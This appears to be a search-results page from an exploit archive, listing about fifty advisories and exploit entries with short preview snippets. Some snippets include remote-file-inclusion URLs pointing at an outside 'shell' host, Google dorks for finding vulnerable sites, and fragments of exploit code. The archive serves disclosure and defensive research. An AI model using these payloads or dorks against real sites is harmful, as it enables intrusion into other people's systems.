41207 matches found
BigTree CMS 4.0 RC2 - Multiple Vulnerabilities
BigTree CMS 4.0 RC2 - Multiple Vulnerabilities Advisory ID: HTB23165 Product: BigTree CMS Vendor: BigTree CMS Vulnerable Versions: 4.0 RC2 and probably prior Tested Version: 4.0 RC2 Vendor Notification: July 17, 2013 Vendor Patch: July 17, 2013 Public Disclosure: August 7, 2013 Vulnerability Type...
RealVNC 4.1.0/4.1.1 - Authentication Bypass
RealVNC 4.1.0/4.1.1 - Authentication Bypass Exploit Title: RealVNC 4.1.0 and 4.1.1 Authentication Bypass Exploit Date: 2012-05-13 Author: @fdiskyou e-mail: rui at deniable.org Version: 4.1.0 and 4.1.1 Tested on: Windows XP CVE: CVE-2006-2369 Requires vncviewer installed Basic port of hdmoore/msf2...
Microsoft WINS - ECommEndDlg Input Validation Error (MS11-035/MS11-070)
Microsoft WINS - ECommEndDlg Input Validation Error MS11-035/MS11-070 Core Security - Corelabs Advisory http://corelabs.coresecurity.com/ MS WINS ECommEndDlg Input Validation Error 1. Advisory Information Title: MS WINS ECommEndDlg Input Validation Error Advisory ID: CORE-2011-0526 Advisory URL:...
BisonWare BisonFTP Server 3.5 - Remote Buffer Overflow (Metasploit)
BisonWare BisonFTP Server 3.5 - Remote Buffer Overflow Metasploit Title : BisonFTP Server Remote Buffer Overflow Exploit Author : Veerendra G.G SecPod Technologies www.secpod.com Advisory : http://secpod.org/blog/?p=384 http://secpod.org/msf/bisonserverbof.rb Version : BisonFTP Server 'BisonFTP...
Adobe Photoshop CS5 - .gif Remote Code Execution
Adobe Photoshop CS5 - .gif Remote Code Execution Application: Adobe Photoshop CS5 GIF Remote Code Execution Platforms: Adobe Photoshop CS5 12.0 and 12.1 Exploitation: Remote code execution CVE Number: CVE-2011-2131 Adobe Vulnerability Identifier: APSB11-22 PRL: 2011-08 Author: Francis Provencher...
Apple Safari 5.0.5 - SVG Remote Code Execution (DEP Bypass)
Apple Safari 5.0.5 - SVG Remote Code Execution DEP Bypass Abysssec Public Advisory apple killed one of our 0day no point to keep it private anymore : there is another version of exploit using POPup and thats more reliable but as you know safari block pop up by default so we found a cool way to...
vTiger CRM 5.0.4 - Local File Inclusion
vTiger CRM 5.0.4 - Local File Inclusion !/usr/bin/python INFORMATION: Exploit Title: Vtiger CRM 5.0.4 Pre-Auth Local File Inclusion Exploit Google Dork: "The honest Open Source CRM" "vtiger CRM 5.0.4" Date: 5/3/2011 CVE: CVE-2009-3249 Windows link: http://bit.ly/fiOYCL Linux link:...
Comcast DOCSIS 3.0 Business Gateways - Multiple Vulnerabilities
Comcast DOCSIS 3.0 Business Gateways - Multiple Vulnerabilities Trustwave's SpiderLabs Security Advisory TWSL2011-002: Vulnerabilities in Comcast DOCSIS 3.0 Business Gateways D3G-CCR https://www.trustwave.com/spiderlabs/advisories/TWSL2011-002.txt Published: 2011-02-04 Version: 1.0 Vendor: Comcas...
ClanSphere 2010 - Multiple Vulnerabilities
ClanSphere 2010 - Multiple Vulnerabilities Exploit Title: Clansphere Multiple vulnerabilities Date: 24/08/2010 Author: Sweet Contact : [email protected] Software Link: Download:http: http://sourceforge.net/projects/clansphere/ Version: all Tested on: WinXp sp3 Risk : HIGHT...
Member ID The Fish Index PHP - SQL Injection
Member ID The Fish Index PHP - SQL Injection Member ID The Fish Index PHP SQL Injection Vulnerability --== Author ==-- + Author : v4lc0m87 + Contact :...
Apache OFBiz - Multiple Cross-Site Scripting Vulnerabilities
Apache OFBiz - Multiple Cross-Site Scripting Vulnerabilities Bonsai Information Security - Advisory http://www.bonsai-sec.com/research/ Multiple XSS in Apache OFBiz 1. Advisory Information Title: Multiple XSS in Apache OFBiz Advisory ID: BONSAI-2010-0103 Advisory URL:...
NX Web CMS (NX WCMS 4.5) - Multiple Vulnerabilities
NX Web CMS NX WCMS 4.5 - Multiple Vulnerabilities N/X - Web CMS N/X WCMS 4.5 Multiple Vulnerability...
Portable AVS DVD Authoring 1.3.3.51 - Local Crash (PoC)
Portable AVS DVD Authoring 1.3.3.51 - Local Crash PoC C:\perl\bin Exploit Title: Portable AVS DVD Authoring Date: 2010/4pr/05 Author: R3d-D3v!L Version: v1.3.3.51 Tested on: windows XP sp3 Coded by x$file"; print $FILE "$boom"; close$FILE; print "Done..!\n";...
Azadi Network - page SQL Injection
Azadi Network - page SQL Injection Azadi Network page Remote SQL Injection Vulnerability Author: Hussin X Home : WwW.IQ-ty.CoM email : darkangelg85atYahooDoTcom script : www.azadinet.net DorK : "Powered By Azadi...
IBM SolidDB - Invalid Error Code
IBM SolidDB - Invalid Error Code 1. Advisory Information Title: IBM SolidDB invalid error code vulnerability Advisory Id: CORE-2009-1027 Advisory URL: http://www.coresecurity.com/content/ibm-soliddb-errorcode-dos Date published: 2009-11-18 Date of last update: 2009-11-18 Vendors contacted: IBM...
Linux Kernel 2.6.19 (Debian 4) - udp_sendmsg Local Privilege Escalation (3)
Linux Kernel 2.6.19 Debian 4 - udpsendmsg Local Privilege Escalation 3 / hoagieudpsendmsg.c LOCAL LINUX KERNEL ROOT EXPLOIT include include include include include include include include / this code will be called from NFHOOK via output callback in kernel mode / void setcurrenttaskuidsgidstozero...
Real Helix DNA - RTSP SETUP Request Handler
Real Helix DNA - RTSP SETUP Request Handler -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Core Security Technologies - CoreLabs Advisory http://www.coresecurity.com/corelabs/ Real Helix DNA RTSP and SETUP request handler vulnerabilities 1. Advisory Information Title: Real Helix DNA RTSP and SETUP...
Amaya Web Editor 11.0 - XML HTML Parser
Amaya Web Editor 11.0 - XML HTML Parser -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Core Security Technologies - CoreLabs Advisory http://www.coresecurity.com/corelabs/ Amaya web editor XML and HTML parser vulnerabilities 1. Advisory Information Title: Amaya web editor XML and HTML parser...
MKPortal 1.2.1 - Multiple Vulnerabilities
MKPortal 1.2.1 - Multiple Vulnerabilities waraxe-2009-SA070 - Multiple Vulnerabilities in MKPortal = 1.2.1 Author: Janek Vind "waraxe" Date: 15. January 2009 Location: Estonia, Tartu Web:...
Roundcube Webmail 0.2-3 Beta - Code Execution
Roundcube Webmail 0.2-3 Beta - Code Execution Public Release Date of POC: 2008-12-22 Author: Jacobo Avariento Gimeno Sofistic CVE id: CVE-2008-5619 Bugtraq id: 32799 Severity: Critical Vulnerability reported by: RealMurphy Intro ---- Roundcube Webmail is a browser-based IMAP client that uses...
Anzio Web Print Object 3.2.30 - ActiveX Buffer Overflow
Anzio Web Print Object 3.2.30 - ActiveX Buffer Overflow -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Core Security Technologies - CoreLabs Advisory http://www.coresecurity.com/corelabs/ Anzio Web Print Object Buffer Overflow Advisory Information Title: Anzio Web Print Object Buffer Overflow...
OpenBSD 4.0 - vga Local Privilege Escalation
OpenBSD 4.0 - vga Local Privilege Escalation / A PRODUCTION OF LUL-DISLCOSURE INC. PROUDLY PRESENTS...
Linux Kernel 2.6.x - ALSA snd-page-alloc Local Proc File Information Disclosure
Linux Kernel 2.6.x - ALSA snd-page-alloc Local Proc File Information Disclosure / source: https://www.securityfocus.com/bid/25774/info / The Linux kernel is prone to a local privilege-escalation vulnerability. Exploiting this issue may allow local attackers to gain elevated privileges, facilitati...
iziContents rc6 - Local/Remote File Inclusion
iziContents rc6 - Local/Remote File Inclusion remote file inclusion: http://site/path/modules/search/search.php?languagehome=&rootdp=zZz&gsLanguage=http://shell? http://site/path/modules/poll/inlinepoll.php?languagehome=&rootdp=zZz&gsLanguage=http://shell?...
FlashGameScript 1.7 - user SQL Injection
FlashGameScript 1.7 - user SQL Injection FlashGameScript = 1.7 member.php$user SQL-Injection Exploit Vulnrability Discovered By: Xenduer77 ---July 7th, 2007 $user Is passed straight to the query without being filtered. SQL-INJECTION: For Version 1.7: -------...
PHPSecurityAdmin 4.0.2 - Logout.php Remote File Inclusion
PHPSecurityAdmin 4.0.2 - Logout.php Remote File Inclusion source: https://www.securityfocus.com/bid/23801/info PHPSecurityAdmin is prone to a remote file-include vulnerability because it fails to sufficiently sanitize user-supplied input. Exploiting this issue may allow an attacker to compromise...
Madwifi 0.9.2.1 - WPA/RSN IE Remote Kernel Buffer Overflow
Madwifi 0.9.2.1 - WPA/RSN IE Remote Kernel Buffer Overflow / ---- madwifi WPA/RSN IE remote kernel buffer overflow ------ expoit code by: sgrakkyu antifork.org -- 10/1/2007 CVE: 2006-6332 Laurent BUTTI, Jerome RAZNIEWSKI, Julien TINNES for wpa .... memcpybuf, se-sewpaie, se-sewpaie1 + 2...
Apache 1.3.34/1.3.33 (Ubuntu Debian) - CGI TTY Privilege Escalation
Apache 1.3.34/1.3.33 Ubuntu Debian - CGI TTY Privilege Escalation / :: Kristian Hermansen :: Date: 20070229 Description: Local attacker can influence Apache to direct commands into an open tty owned by user who started apache process, usually root. This results in arbitrary command execution...
nabopoll 1.2 - survey.inc.php?path Remote File Inclusion
nabopoll 1.2 - survey.inc.php?path Remote File Inclusion By Cr@zyKing [email protected] Thakns : ApAci & Erne & Uyussman & Eno7 & Thehacker & CrackersChild & Liz0zim Script : nabopoll 1.x Risk : Remote File .nclude | High Site : http://nabocorp.com/ Google Dork : inurl:"nabopoll/" Exploit :...
phpBB++ Build 100 - phpbb_root_path Remote File Inclusion
phpBB++ Build 100 - phpbbrootpath Remote File Inclusion C xoron Name: phpBB++ phpbbrootpath Remote File Include Exploit Author: xoron Exploit coded by xoron Download: http://sourceforge.net/project/showfiles.php?groupid=86688&packageid=90098 xoron.biz - xoron.info Thanx: str0ke, kacper, k1tk4t,...
MGB 0.5.4.5 - email.php?id SQL Injection
MGB 0.5.4.5 - email.php?id SQL Injection !/usr/bin/perl MGB Google dork: intext:mgb.0.5.. & intext:mopzz | intext:mgb.0.5.4.. use IO::Socket::INET; usage unless @ARGV == 2; $host = $ARGV0; $dir = $ARGV1; $dir = "/$dir" if $dir ! /^//; $dir = "$dir/" if $dir ! //$/; $host = s/http:////g; $path...
PHPWind 5.0.1 - AdminUser Blind SQL Injection
PHPWind 5.0.1 - AdminUser Blind SQL Injection...
Mambo Component phpBB 1.2.4 - Multiple Remote File Inclusions
Mambo Component phpBB 1.2.4 - Multiple Remote File Inclusions source: https://www.securityfocus.com/bid/18914/info phpBB for Mambo is prone to multiple remote file-include vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. An attacker ca...
phpBB 2.0.20 - AdminRestore DBdefault_lang Remote Command Execution
phpBB 2.0.20 - AdminRestore DBdefaultlang Remote Command Execution !/usr/bin/php -q -d shortopentag=on you need an admin sid, works regardless of magicquotesgpc settings\r\n"; echo "tested and working against a fresh PhpBB installation\r\n\r\n"; if $argc5 echo "Usage: php ".$argv0." host path sid...
Limbo CMS 1.0.4.2 - catid SQL Injection
Limbo CMS 1.0.4.2 - catid SQL Injection i Limbo CMS option=weblinks sql injection exploit i coded by Oo Usage: ?host=hostname&path=limbopath&id=userid Exemple: ?host=127.0.0.1&path=/limbo&id=1 g Google: inurl:"index2.php?option=rss" OR "powered By Limbo CMS" /",$f && pregmatch"/login/",$f echo...
Mall23 - AddItem.asp SQL Injection
Mall23 - AddItem.asp SQL Injection source: https://www.securityfocus.com/bid/14898/info Mall23 is prone to an SQL injection vulnerability. This is due to a lack of proper sanitization of user-supplied input before using it in an SQL query. Successful exploitation could result in a compromise of t...
Ethereal 0.x - Multiple iSNS SMB SNMP Protocol Dissector Vulnerabilities
Ethereal 0.x - Multiple iSNS SMB SNMP Protocol Dissector Vulnerabilities // source: https://www.securityfocus.com/bid/10672/info Ethereal 0.10.5 has been released to address multiple vulnerabilities, including an iSNS protocol dissector vulnerability, a SMB protocol dissector vulnerability, and a...
Coppermine Photo Gallery 1.2.0 RC4 - init.inc.php Remote File Inclusion
Coppermine Photo Gallery 1.2.0 RC4 - init.inc.php Remote File Inclusion source: https://www.securityfocus.com/bid/10253/info Coppermine Photo Gallery is reported prone to multiple input-validation vulnerabilities, some of which may lead to arbitrary command execution. These issues occur because t...
PHPSysInfo 2.0/2.1 - index.php LNG File Disclosure
PHPSysInfo 2.0/2.1 - index.php LNG File Disclosure source: https://www.securityfocus.com/bid/7286/info PHPSysInfo has been reported to be vulnerable to a file disclosure issue. Local users may be capable of influencing the include path for PHPSysinfo language include files. If the malicious langua...
RICOH Aficio SP 5210SF Printer - entryNameIn HTML Injection
RICOH Aficio SP 5210SF Printer - entryNameIn HTML Injection Exploit Title: RICOH Aficio SP 5210SF Printer - 'entryNameIn' HTML Injection Discovery by: Olga Villagran Discovery Date: 2020-03-02 Vendor Homepage: https://www.ricoh.com/ Hardware Link:...
Joplin Desktop 1.0.184 - Cross-Site Scripting
Joplin Desktop 1.0.184 - Cross-Site Scripting Exploit Title: Joplin Desktop 1.0.184 - Cross-Site Scripting Exploit Author: Javier Olmedo Date: 2020-02-27 Vendor: Laurent Cozic Software Link: https://github.com/laurent22/joplin/archive/v1.0.184.zip Affected Version: 1.0.184 and before Patched...
SecuSTATION IPCAM-130 HD Camera - Remote Configuration Disclosure
SecuSTATION IPCAM-130 HD Camera - Remote Configuration Disclosure Exploit Title: SecuSTATION IPCAM-130 HD Camera - Remote Configuration Disclosure Author: Todor Donev Date: 2020-02-23 Vendor: https://secu.jp/ Product Link: https://secu.jp/support/831nh1.html CVE: N/A SecuSTATION IPCAM-130 HD Came...
School ERP System 1.0 - Cross Site Request Forgery (Add Admin)
School ERP System 1.0 - Cross Site Request Forgery Add Admin Title: School ERP System 1.0 - Cross Site Request Forgery Add Admin Date: 2020-01-31 Exploit Author: J3rryBl4nks Vendor Homepage: https://sourceforge.net/projects/school-erp-ultimate/files/ Software Link:...
AVE DOMINAplus 1.10.x - Cross-Site Request Forgery (enable/disable alarm)
AVE DOMINAplus 1.10.x - Cross-Site Request Forgery enable/disable alarm Exploit: AVE DOMINAplus 1.10.x - Cross-Site Request Forgery enable/disable alarm Date: 2019-12-30 Author: LiquidWorm Vendor: AVE S.p.A. Product web page: https://www.ave.it | https://www.domoticaplus.it Affected version: Web...
Visual Studio 2008 - XML External Entity Injection
Visual Studio 2008 - XML External Entity Injection Exploit Title: Visual Studio 2008 - XML External Entity Injection Discovery by: hyp3rlinx Date: 2019-12-02 Vendor Homepage: www.microsoft.com Software Link: Visual Studio 2008 Express IDE Tested Version: 2008 CVE: N/A + Credits: John Page aka...
Microsoft Windows Server 2012 - Group Policy Security Feature Bypass
Microsoft Windows Server 2012 - Group Policy Security Feature Bypass Exploit Title: Microsoft Windows Server 2012 - 'Group Policy' Security Feature Bypass Date: 2019-10-28 Exploit Author: Thomas Zuk Version: Windows Server 2003, Windows Vista, Windows Server 2008, Windows 7, Windows Server 2008 R...
Moxa EDR-810 - Command Injection Information Disclosure
Moxa EDR-810 - Command Injection Information Disclosure During an engagement for a client, RandoriSec found 2 vulnerabilities on Moxa EDR-810 Series Secure Routers. The first one is a command injection vulnerability found on the CLI allowing an authenticated user to obtain root privileges. And th...
Enigma NMS 65.0.0 - OS Command Injection
Enigma NMS 65.0.0 - OS Command Injection !/usr/bin/python Exploit Title: Enigma NMS OS Command Injection NETSAS Pty Ltd Enigma NMS Date: 21 July 2019 Author: Mark Cross @xerubus | mogozobo.com Vendor: NETSAS Pty Ltd Vendor...
phpMyAdmin 4.8 - Cross-Site Request Forgery
phpMyAdmin 4.8 - Cross-Site Request Forgery Exploit Title: Cross Site Request Forgery CSRF Date: 11 June 2019 Exploit Author: Riemann Vendor Homepage: https://www.phpmyadmin.net/ Software Link: https://www.phpmyadmin.net/downloads/ Version: 4.8 Tested on: UBUNTU 16.04 LTS -Installed Docker image ...
Zoho ManageEngine ServiceDesk Plus 9.3 - SearchN.do Cross-Site Scripting
Zoho ManageEngine ServiceDesk Plus 9.3 - SearchN.do Cross-Site Scripting Exploit Title: Zoho ManageEngine ServiceDesk Plus 9.3 Cross-Site Scripting via SearchN.do Date: 2019-06-04 Exploit Author: Tarantula Team - VinCSS a member of Vingroup Vendor Homepage:...